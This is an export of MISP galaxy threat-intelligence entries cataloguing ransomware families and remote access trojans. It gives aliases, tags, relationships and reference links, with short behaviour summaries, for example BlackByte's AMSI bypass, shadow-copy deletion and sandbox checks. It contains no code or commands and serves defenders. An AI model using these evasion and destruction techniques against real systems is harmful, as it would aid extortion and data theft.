https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/

https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://gbhackers.com/black-basta-ransomware/

https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

https://securelist.com/luna-black-basta-ransomware/106950/

https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/

https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/

https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

BlackByte

BlackByte is recently discovered Ransomware with a .NET DLL core payload wrapped in JavaScript. It employs heavy obfuscation both in its JavaScript wrapper and .NET DLL core.

Once the JavaScript wrapper is executed, the malware will de-obfuscate the core payload and execute it in memory. The core .DLL is loaded and BlackByte will check the installed operating system language and terminate if an eastern European language is found.

It will proceed to check for the presence of several anti-virus and sandbox-related .DLLs, attempt to bypass AMSI, delete system shadow-copies in order to hinder system recovery, and modify several other system services (including Windows Firewall) in order to “prep” the system for encryption. Once the system is “ready” for encryption, it will download a symmetric key-file which will be used to encrypt files on the system. If this file is not found, the malware will terminate.

Unlike most Ransomware today, BlackByte uses a single symmetric encryption key, and does not generate a unique encryption key for each victim system, meaning the same key can be used to decrypt all files encrypted by the malware.

This makes for substantially easier key-management for the actors behind BlackByte at the cost of a weaker encryption scheme and easier victim system recovery (as there is only a single online point with a single key to maintain).

As with most Ransomware today, BlackByte has worming capabilities and can infect additional endpoints on the same network.

The tag is: misp-galaxy:ransomware="BlackByte"

BlackByte has relationships with:

  • successor-of: misp-galaxy:ransomware="Conti" with estimative-language:likelihood-probability="likely"

Table 8602. Table References

Links

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://redcanary.com/blog/blackbyte-ransomware/

https://www.ic3.gov/Media/News/2022/220211.pdf

https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/

https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/

https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure

https://www.trellix.com/en-us/about/newsroom/stories/research/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants

https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups

https://blog.talosintelligence.com/the-blackbyte-ransomware-group-is/

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/

https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/

RedAlert

Ransomware

The tag is: misp-galaxy:ransomware="RedAlert"

Cheerscrypt

Ransomware

The tag is: misp-galaxy:ransomware="Cheerscrypt"

GwisinLocker

Ransomware

The tag is: misp-galaxy:ransomware="GwisinLocker"

Luna Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Luna Ransomware"

AvosLocker

In March 2022, the FBI and the U.S. Treasury Financial Crimes Enforcement Network released a joint advisory addressing AvosLocker and their activity targeting organizations across several critical infrastructure sectors. The RaaS gang deploys ransomware onto their victim’s networks and systems, then threatens to leak their files on the dark web if they don’t pay up. AvosLocker is both the name of the RaaS gang, as well as the name of the ransomware itself.

In May 2022, AvosLocker took responsibility for attacking and stealing data from the Texas-based healthcare organization, CHRISTUS Health. CHRISTUS Health runs hundreds of healthcare facilities across Mexico, the U.S., and South America. The group stole information from a cancer patient registry which included names, social security numbers, diagnoses, dates of birth, and other medical information. The nonprofit Catholic health system has more than 600 healthcare facilities in Texas, Louisiana, New Mexico, and Arkansas. There are also facilities in Columbia, Mexico, and Chile.

Fortunately, the ransomware attack was quickly identified and was limited. While other healthcare organizations have not been as fortunate with ransomware attacks, the AvosLocker attack didn’t impact CHRISTUS Health’s patient care or clinical operations. CHRISTUS Health didn’t reveal whether or not the security incident included ransomware, data exfiltration or extortion, but due to AvosLocker’s reputation, it is more than likely that the incident included at least one of the three.

The tag is: misp-galaxy:ransomware="AvosLocker"

AvosLocker is also known as:

  • Avos

Table 8603. Table References

Links

https://www.avertium.com/resources/threat-reports/in-depth-look-at-avoslocker-ransomware

https://unit42.paloaltonetworks.com/atoms/avoslocker-ransomware/

https://www.kroll.com/en/insights/publications/cyber/avoslocker-ransomware-update

https://www.picussecurity.com/resource/avos-locker-ransomware-group

https://brandefense.io/blog/ransomware/in-depth-analysis-of-avoslocker-ransomware/

https://blog.talosintelligence.com/avoslocker-new-arsenal/

https://www.techrepublic.com/article/avos-ransomware-updates-attack/

https://www.tripwire.com/state-of-security/avoslocker-ransomware-what-you-need-to-know

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker

https://malpedia.caad.fkie.fraunhofer.de/details/elf.avoslocker

https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen

https://www.ic3.gov/Media/News/2022/220318.pdf

https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux

https://blog.lexfo.fr/Avoslocker.html

https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html

https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/

https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners

https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

https://news.sophos.com/en-us/2021/12/22/avos-locker-remotely-accesses-boxes-even-running-in-safe-mode/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf

https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

PLAY Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="PLAY Ransomware"

Qyick Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Qyick Ransomware"

Agenda Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Agenda Ransomware"

Karakurt

Ransomware

The tag is: misp-galaxy:ransomware="Karakurt"

0Mega

0mega, a new ransomware operation, has been observed targeting organizations around the world. The ransomware operators are launching double-extortion attacks and demanding millions of dollars as ransom.

0mega ransomware operation launched in May and has already claimed multiple victims. 0mega maintains a dedicated data leak site that the attackers use to post stolen data if the demanded ransom is not paid. The leak site currently hosts 152 GB of data stolen from an electronics repair firm in an attack that happened in May. However, an additional victim has since been removed, implying that they might have paid the ransom to the 0mega group.

How does it work? Hackers add the .0mega extension to the encrypted file’s names and create ransom notes (DECRYPT-FILES[.]txt). The ransom note has a link to a Tor payment negotiation site with a support chat to reach out to the ransomware group. To log in to this site, the victims are asked to upload their ransom notes with a unique Base64-encoded blob identity.

The tag is: misp-galaxy:ransomware="0Mega"

Table 8604. Table References

Links

https://www.bleepingcomputer.com/news/security/new-0mega-ransomware-targets-businesses-in-double-extortion-attacks/

https://cyware.com/news/new-0mega-ransomware-joins-the-double-extortion-threat-landscape-158fb321

Abraham’s Ax

Abraham’s Ax announced their existence and mission through social media channels such as Twitter posts on November 8, 2022. Abraham’s Ax use a WordPress blog as the basis for their leak sites. Abraham’s Ax site is available in Hebrew, Farsi, and English. The site also provides versions available via Tor websites, although it appeared to be under construction at the time of analysis. Used domain is registered with EgenSajt.se

The tag is: misp-galaxy:ransomware="Abraham’s Ax"

Abraham’s Ax is also known as:

  • Abrahams_Ax

Table 8605. Table References

Links

https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff

aGl0bGVyCg

Ransomware

The tag is: misp-galaxy:ransomware="aGl0bGVyCg"

aGl0bGVyCg has relationships with:

  • similar: misp-galaxy:ransomware="Hitler" with estimative-language:likelihood-probability="unlikely"

Table 8606. Table References

Links

https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/malware/hitler_ransomware.txt

https://twitter.com/fr0s7_/status/1460229982278541315

Ako

Once installed, Ako will attempt to delete Volume Shadow Copies and disable recovery services. It will then begin to encrypt all files that do not match a hard-coded list using an unknown algorithm. Whilst this is happening, Ako will scan the affected network for any connected devices or drives for it to propagate to.

The tag is: misp-galaxy:ransomware="Ako"

Ako is also known as:

  • MedusaReborn

Table 8607. Table References

Links

https://digital.nhs.uk/cyber-alerts/2020/cc-3345

https://www.pcrisk.com/removal-guides/16737-ako-ransomware

https://www.pcrisk.com/images/stories/screenshots202001/ako-ransom-note-second_variant.jpg

https://www.pcrisk.com/images/stories/screenshots202004/ako-ransomware-update-2020-04-09-text-file.jpg

https://www.pcrisk.com/images/stories/screenshots202004/ako-update-2020-04-21-text-file.jpg

https://www.pcrisk.com/images/stories/screenshots202004/ako-update-2020-04-21-html-file.jpg

https://www.pcrisk.com/images/stories/screenshots202010/ako-ransomware-update-2020-10-15-text-file.gif

Arvinclub

Arvin Club is a popular Ransomware group with a widespread Telegram presence, which includes personal group chats, and official channels. The group recently launched their official TOR/ Onion website to update their status and release details of their latest attacks and data breaches. Their latest target is Kendriya Vidyala, a chain of Schools in India. The group has exposed the Personally Identifiable Information (PII) of some students.

The tag is: misp-galaxy:ransomware="Arvinclub"

Arvinclub is also known as:

  • Arvin Club

Avaddon

Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.

The tag is: misp-galaxy:ransomware="Avaddon"

Table 8609. Table References

Links

https://heimdalsecurity.com/blog/avaddon-ransomware/

https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis

Avos

The tag is: misp-galaxy:ransomware="Avos"

Avos has relationships with:

  • similar: misp-galaxy:ransomware="AvosLocker" with estimative-language:likelihood-probability="very-likely"

Aztroteam

The tag is: misp-galaxy:ransomware="Aztroteam"

Babuk-Locker

The tag is: misp-galaxy:ransomware=" Babuk-Locker"

Babuk-Locker has relationships with:
  • similar: misp-galaxy:ransomware="Babuk Ransomsware" with estimative-language:likelihood-probability="very-likely"

Babyduck

The tag is: misp-galaxy:ransomware="Babyduck"

Table 8610. Table References

Links

https://twitter.com/PolarToffee/status/1445873002801889280/photo/3

Bianlian

BianLian used subtle techniques to exploit, enumerate, and move laterally in victim networks to remain undetected and aggressively worked to counter Endpoint Detection & Response (EDR) protections during the encryption phase of their operations. The group has displayed signs of being new to the practical business aspects of ransomware and associated logistics. Generally they seemed to be experiencing the growing pains of a group of talented hackers new to this aspect of criminal extortion.

Infrastructure associated with the BianLian group first appeared online in December 2021 and their toolset appears to have been under active development since then. Finally, we have observed the BianLian threat actor tripling their known command and control (C2) infrastructure in the month of August, suggesting a possible increase in the actor’s operational tempo.

The tag is: misp-galaxy:ransomware="Bianlian"

Bianlian is also known as:

  • Hydra

Bianlian has relationships with:

  • similar: misp-galaxy:ransomware="Hydra" with estimative-language:likelihood-probability="likely"

Table 8611. Table References

Links

https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/

https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye

https://cryptax.medium.com/android-bianlian-payload-61febabed00a

https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221

https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5

https://cryptax.medium.com/multidex-trick-to-unpack-android-bianlian-ed52eb791e56

https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/

https://twitter.com/malwrhunterteam/status/1558548947584548865

https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware

https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Hunting-the-Android-BianLian-botnet.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Hunting-the-Android-BianLian-botnet.pdf

https://www.youtube.com/watch?v=DPFcvSy4OZk

Blackshadow

The tag is: misp-galaxy:ransomware="Blackshadow"

Blacktor

The tag is: misp-galaxy:ransomware="Blacktor"

Bluesky

The tag is: misp-galaxy:ransomware="Bluesky"

Bonacigroup

The tag is: misp-galaxy:ransomware="Bonacigroup"

Cheers

The tag is: misp-galaxy:ransomware="Cheers"

Cooming

The tag is: misp-galaxy:ransomware="Cooming"

Crylock

The tag is: misp-galaxy:ransomware="Crylock"

Crylock is also known as:

  • Cryakl

Cuba

The tag is: misp-galaxy:ransomware="Cuba"

Cuba is also known as:

  • COLDDRAW

Daixin

The tag is: misp-galaxy:ransomware="Daixin"

Dark Power

The tag is: misp-galaxy:ransomware="Dark Power"

Darkangel

The tag is: misp-galaxy:ransomware="Darkangel"

Darkbit01

The tag is: misp-galaxy:ransomware="Darkbit01"

Dataleak

The tag is: misp-galaxy:ransomware="Dataleak"

Diavol

The tag is: misp-galaxy:ransomware="Diavol"

Donutleaks

The tag is: misp-galaxy:ransomware="Donutleaks"

Endurance

The tag is: misp-galaxy:ransomware="Endurance"

Entropy

The tag is: misp-galaxy:ransomware="Entropy"

Ep918

The tag is: misp-galaxy:ransomware="Ep918"

Everest

The tag is: misp-galaxy:ransomware="Everest"

Freecivilian

The tag is: misp-galaxy:ransomware="Freecivilian"

Fsteam

The tag is: misp-galaxy:ransomware="Fsteam"

Grief

The tag is: misp-galaxy:ransomware="Grief"

Groove

The tag is: misp-galaxy:ransomware="Groove"

Haron

The tag is: misp-galaxy:ransomware="Haron"

Hotarus

The tag is: misp-galaxy:ransomware="Hotarus"

Icefire

The tag is: misp-galaxy:ransomware="Icefire"

Justice_Blade

The tag is: misp-galaxy:ransomware="Justice_Blade"

Kelvin Security

The tag is: misp-galaxy:ransomware="Kelvin Security"

Lapsus$

The tag is: misp-galaxy:ransomware="Lapsus$"

Lilith

The tag is: misp-galaxy:ransomware="Lilith"

Lockbit3

The tag is: misp-galaxy:ransomware="Lockbit3"

Lockbit3 has relationships with:

  • similar: misp-galaxy:ransomware="LockBit" with estimative-language:likelihood-probability="likely"

Lolnek

The tag is: misp-galaxy:ransomware="Lolnek"

Lv

The tag is: misp-galaxy:ransomware="Lv"

Mallox

The tag is: misp-galaxy:ransomware="Mallox"

Mbc

The tag is: misp-galaxy:ransomware="Mbc"

Midas

The tag is: misp-galaxy:ransomware="Midas"

Moisha

The tag is: misp-galaxy:ransomware="Moisha"

Monte

The tag is: misp-galaxy:ransomware="Monte"

Monti

The tag is: misp-galaxy:ransomware="Monti"

Mydecryptor

The tag is: misp-galaxy:ransomware="Mydecryptor"

N3Tworm

The tag is: misp-galaxy:ransomware="N3Tworm"

Netwalker

The tag is: misp-galaxy:ransomware="Netwalker"

Nevada

The tag is: misp-galaxy:ransomware="Nevada"

Nightsky

The tag is: misp-galaxy:ransomware="Nightsky"

Nokoyawa

The tag is: misp-galaxy:ransomware="Nokoyawa"

Onepercent

The tag is: misp-galaxy:ransomware="Onepercent"

Payloadbin

The tag is: misp-galaxy:ransomware="Payloadbin"

Prometheus

The tag is: misp-galaxy:ransomware="Prometheus"

Qilin

The tag is: misp-galaxy:ransomware="Qilin"

Qlocker

The tag is: misp-galaxy:ransomware="Qlocker"

Ramp

The tag is: misp-galaxy:ransomware="Ramp"

Ransomcartel

The tag is: misp-galaxy:ransomware="Ransomcartel"

Ransomhouse

The tag is: misp-galaxy:ransomware="Ransomhouse"

Ranzy

The tag is: misp-galaxy:ransomware="Ranzy"

Relic

The tag is: misp-galaxy:ransomware="Relic"

Royal

The tag is: misp-galaxy:ransomware="Royal"

Rransom

The tag is: misp-galaxy:ransomware="Rransom"

Sabbath

The tag is: misp-galaxy:ransomware="Sabbath"

Solidbit

The tag is: misp-galaxy:ransomware="Solidbit"

Sparta

The tag is: misp-galaxy:ransomware="Sparta"

Spook

The tag is: misp-galaxy:ransomware="Spook"

Stormous

The tag is: misp-galaxy:ransomware="Stormous"

Unknown

The tag is: misp-galaxy:ransomware="Unknown"

Unsafe

The tag is: misp-galaxy:ransomware="Unsafe"

V Is Vendetta

The tag is: misp-galaxy:ransomware="V Is Vendetta"

V Is Vendetta has relationships with:

  • similar: misp-galaxy:ransomware="Samas-Samsam" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Vendetta" with estimative-language:likelihood-probability="likely"

Vfokx

The tag is: misp-galaxy:ransomware="Vfokx"

Vicesociety

The tag is: misp-galaxy:ransomware="Vicesociety"

Vsop

The tag is: misp-galaxy:ransomware="Vsop"

Xinglocker

The tag is: misp-galaxy:ransomware="Xinglocker"

Xinof

The tag is: misp-galaxy:ransomware="Xinof"

Yanluowang

The tag is: misp-galaxy:ransomware="Yanluowang"

RAT

remote administration tool or remote access tool (RAT), also called sometimes remote access trojan, is a piece of software or programming that allows a remote "operator" to control a system as if they have physical access to that system..

RAT is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various - raw-data

Iperius Remote

Iperius Remote is advertised with these features: Control remotely any computer with Iperius Remote Desktop Free. For remote support or presentations. Ideal for technical assistance. Easy to use and secure.

The tag is: misp-galaxy:rat="Iperius Remote"

Table 8612. Table References

Links

https://www.iperiusremote.com

TeamViewer

TeamViewer is a proprietary computer software package for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.

The tag is: misp-galaxy:rat="TeamViewer"

Table 8613. Table References

Links

https://www.teamviewer.com

JadeRAT

JadeRAT is just one example of numerous mobile surveillanceware families we’ve seen in recent months, indicating that actors are continuing to incorporate mobile tools in their attack chains. Threat actor, using a tool called JadeRAT, targets the mobile phones of ethnic minorities in China, notably Uighurs, for the purpose of espionage.

The tag is: misp-galaxy:rat="JadeRAT"

JadeRAT has relationships with:

  • similar: misp-galaxy:malpedia="JadeRAT" with estimative-language:likelihood-probability="likely"

Table 8614. Table References

Links

https://blog.lookout.com/mobile-threat-jaderat

https://www.cfr.org/interactive/cyber-operations/jaderat

Back Orifice

Back Orifice (often shortened to BO) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location.

The tag is: misp-galaxy:rat="Back Orifice"

Back Orifice is also known as:

  • BO

Table 8615. Table References

Links

http://www.cultdeadcow.com/tools/bo.html

http://www.symantec.com/avcenter/warn/backorifice.html

Netbus

NetBus or Netbus is a software program for remotely controlling a Microsoft Windows computer system over a network. It was created in 1998 and has been very controversial for its potential of being used as a backdoor.

The tag is: misp-galaxy:rat="Netbus"

Netbus is also known as:

  • NetBus

Table 8616. Table References

Links

http://www.symantec.com/avcenter/warn/backorifice.html

https://www.f-secure.com/v-descs/netbus.shtml

PoisonIvy

Poison Ivy is a RAT which was freely available and first released in 2005.

The tag is: misp-galaxy:rat="PoisonIvy"

PoisonIvy is also known as:

  • Poison Ivy

  • Backdoor.Win32.PoisonIvy

  • Gen:Trojan.Heur.PT

PoisonIvy has relationships with:

  • similar: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="poisonivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="APT14" with estimative-language:likelihood-probability="likely"

Table 8617. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf

https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml

Sub7

Sub7, or SubSeven or Sub7Server, is a Trojan horse program.[1] Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven". Sub7 was created by Mobman. Mobman has not maintained or updated the software since 2004, however an author known as Read101 has carried on the Sub7 legacy.

The tag is: misp-galaxy:rat="Sub7"

Sub7 is also known as:

  • SubSeven

  • Sub7Server

Table 8618. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2001-020114-5445-99

Beast Trojan

Beast is a Windows-based backdoor trojan horse, more commonly known in the hacking community as a Remote Administration Tool or a "RAT". It is capable of infecting versions of Windows from 95 to 10.

The tag is: misp-galaxy:rat="Beast Trojan"

Table 8619. Table References

Links

https://en.wikipedia.org/wiki/Beast_(Trojan_horse)

Bifrost

Bifrost is a discontinued backdoor trojan horse family of more than 10 variants which can infect Windows 95 through Windows 10 (although on modern Windows systems, after Windows XP, its functionality is limited). Bifrost uses the typical server, server builder, and client backdoor program configuration to allow a remote attacker, who uses the client, to execute arbitrary code on the compromised machine (which runs the server whose behavior can be controlled by the server editor).

The tag is: misp-galaxy:rat="Bifrost"

Table 8620. Table References

Links

https://www.revolvy.com/main/index.php?s=Bifrost%20(trojan%20horse)&item_type=topic

http://malware-info.blogspot.lu/2008/10/bifrost-trojan.html

Blackshades

Blackshades is the name of a malicious trojan horse used by hackers to control computers remotely. The malware targets computers using Microsoft Windows -based operating systems.[2] According to US officials, over 500,000 computer systems have been infected worldwide with the software.

The tag is: misp-galaxy:rat="Blackshades"

Blackshades has relationships with:

  • similar: misp-galaxy:tool="Blackshades" with estimative-language:likelihood-probability="likely"

Table 8621. Table References

Links

https://krebsonsecurity.com/2014/05/blackshades-trojan-users-had-it-coming/

DarkComet

DarkComet is a Remote Administration Tool (RAT) which was developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from the United Kingdom. Although the RAT was developed back in 2008, it began to proliferate at the start of 2012.

The tag is: misp-galaxy:rat="DarkComet"

DarkComet is also known as:

  • Dark Comet

DarkComet has relationships with:

  • similar: misp-galaxy:tool="Dark Comet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="DarkComet" with estimative-language:likelihood-probability="likely"

Table 8622. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/

https://blogs.cisco.com/security/talos/darkkomet-rat-spam

Lanfiltrator

Backdoor.Lanfiltrator is a backdoor Trojan that gives an attacker unauthorized access to a compromised computer. The detection is used for a family of Trojans that are produced by the Backdoor.Lanfiltrator generator.

The tag is: misp-galaxy:rat="Lanfiltrator"

Table 8623. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2002-121116-0350-99

Win32.HsIdir

Win32.HsIdir is an advanced remote administrator tool systems was done by the original author HS32-Idir, it is the development of the release made since 2006 Copyright © 2006-2010 HS32-Idir.

The tag is: misp-galaxy:rat="Win32.HsIdir"

Table 8624. Table References

Links

http://lexmarket.su/thread-27692.html

https://www.nulled.to/topic/129749-win32hsidir-rat/

Optix Pro

Optix Pro is a configurable remote access tool or Trojan, similar to SubSeven or BO2K

The tag is: misp-galaxy:rat="Optix Pro"

Table 8625. Table References

Links

https://en.wikipedia.org/wiki/Optix_Pro

https://www.symantec.com/security_response/writeup.jsp?docid=2002-090416-0521-99

https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20208

Back Orifice 2000

Back Orifice 2000 (often shortened to BO2k) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location. The name is a pun on Microsoft BackOffice Server software. Back Orifice 2000 is a new version of the famous Back Orifice backdoor trojan (hacker’s remote access tool). It was created by the Cult of Dead Cow hackers group in July 1999. Originally the BO2K was released as a source code and utilities package on a CD-ROM. There are reports that some files on that CD-ROM were infected with CIH virus, so the people who got that CD might get infected and spread not only the compiled backdoor, but also the CIH virus.

The tag is: misp-galaxy:rat="Back Orifice 2000"

Back Orifice 2000 is also known as:

  • BO2k

Table 8626. Table References

Links

https://en.wikipedia.org/wiki/Back_Orifice_2000

https://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=10229

https://www.symantec.com/security_response/writeup.jsp?docid=2000-121814-5417-99

https://www.f-secure.com/v-descs/bo2k.shtml

RealVNC

The software consists of a server and client application for the Virtual Network Computing (VNC) protocol to control another

The tag is: misp-galaxy:rat="RealVNC"

RealVNC is also known as:

  • VNC Connect

  • VNC Viewer

Table 8627. Table References

Links

https://www.realvnc.com/

Adwind RAT

Backdoor:Java/Adwind is a Java archive (.JAR) file that drops a malicious component onto the machines and runs as a backdoor. When active, it is capable of stealing user information and may also be used to distribute other malware.

The tag is: misp-galaxy:rat="Adwind RAT"

Adwind RAT is also known as:

  • UNRECOM

  • UNiversal REmote COntrol Multi-Platform

  • Frutas

  • AlienSpy

  • Unrecom

  • Jsocket

  • JBifrost

Adwind RAT has relationships with:

  • similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 8628. Table References

Links

https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf

https://www.f-secure.com/v-descs/backdoor_java_adwind.shtml

https://blog.fortinet.com/2016/08/16/jbifrost-yet-another-incarnation-of-the-adwind-rat

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

Arcom

The malware is a Remote Access Trojan (RAT), known as Arcom RAT, and it is sold on underground forums for $2000.00.

The tag is: misp-galaxy:rat="Arcom"

Table 8630. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99

http://blog.trendmicro.com/trendlabs-security-intelligence/tsunami-warning-leads-to-arcom-rat/

BlackNix

BlackNix rat is a rat coded in delphi.

The tag is: misp-galaxy:rat="BlackNix"

Table 8631. Table References

Links

https://leakforums.net/thread-18123?tid=18123&&pq=1

Blue Banana

Blue Banana is a RAT (Remote Administration Tool) created purely in Java

The tag is: misp-galaxy:rat="Blue Banana"

Table 8632. Table References

Links

https://leakforums.net/thread-123872

https://techanarchy.net/2014/02/blue-banana-rat-config/

Bozok

Bozok, like many other popular RATs, is freely available. The author of the Bozok RAT goes by the moniker “Slayer616” and has created another RAT known as Schwarze Sonne, or “SS-RAT” for short. Both of these RATs are free and easy to find — various APT actors have used both in previous targeted attacks.

The tag is: misp-galaxy:rat="Bozok"

Bozok has relationships with:

  • similar: misp-galaxy:malpedia="Bozok" with estimative-language:likelihood-probability="likely"

Table 8633. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html

ClientMesh

ClientMesh is a Remote Administration Application yhich allows a user to control a number of client PCs from around the world.

The tag is: misp-galaxy:rat="ClientMesh"

Table 8634. Table References

Links

https://sinister.ly/Thread-ClientMesh-RAT-In-Built-FUD-Crypter-Stable-DDoSer-No-PortForwading-40-Lifetime

https://blog.yakuza112.org/2012/clientmesh-rat-v5-cracked-clean/

CyberGate

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim’s passwords and can also get the screen shots of his computer’s screen.

The tag is: misp-galaxy:rat="CyberGate"

CyberGate has relationships with:

  • similar: misp-galaxy:malpedia="CyberGate" with estimative-language:likelihood-probability="likely"

Table 8635. Table References

Links

http://www.hackersthirst.com/2011/03/cybergate-rat-hacking-facebook-twitter.html

http://www.nbcnews.com/id/41584097/ns/technology_and_science-security/t/cybergate-leaked-e-mails-hint-corporate-hacking-conspiracy/

Dark DDoSeR

The tag is: misp-galaxy:rat="Dark DDoSeR"

Table 8636. Table References

Links

http://meinblogzumtesten.blogspot.lu/2013/05/dark-ddoser-v56c-cracked.html

DarkRat

In March 2017, Fujitsu Cyber Threat Intelligence uncovered a newly developed remote access tool referred to by its developer as ‘Dark RAT’ – a tool used to steal sensitive information from victims. Offered as a Fully Undetectable build (FUD) the RAT has a tiered price model including 24/7 support and an Android version. Android malware has seen a significant rise in interest and in 2015 this resulted in the arrests of a number of suspects involved in the infamous DroidJack malware.

The tag is: misp-galaxy:rat="DarkRat"

DarkRat is also known as:

  • DarkRAT

Table 8637. Table References

Links

https://www.infosecurity-magazine.com/blogs/the-dark-rat/

